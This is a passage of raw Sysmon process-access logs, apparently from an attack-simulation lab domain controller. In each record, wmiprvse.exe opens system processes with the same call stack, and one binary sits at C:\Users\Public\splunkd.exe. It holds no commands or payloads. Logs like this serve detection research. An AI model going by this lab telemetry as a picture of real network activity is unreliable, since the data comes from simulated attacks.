Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027859Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027858Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027857Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027856Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027855Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027854Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027853Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027852Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027851Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027850Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027849Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027848Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.240{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027847Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.240{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027846Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.240{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027845Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.240{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027844Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.240{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027843Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.240{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027842Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.240{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027841Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.240{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027840Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 